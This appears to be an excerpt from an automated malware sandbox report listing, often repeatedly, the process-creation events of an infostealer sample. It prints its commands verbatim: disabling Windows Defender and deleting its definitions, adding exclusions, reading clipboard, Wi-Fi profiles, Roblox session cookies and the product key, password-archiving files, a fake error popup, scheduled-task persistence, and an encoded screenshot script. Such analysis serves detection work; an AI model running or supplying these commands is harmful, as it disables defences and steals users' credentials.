Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Users\user\Desktop\sB2ClgrGng.exe "C:\Users\user\Desktop\sB2ClgrGng.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAC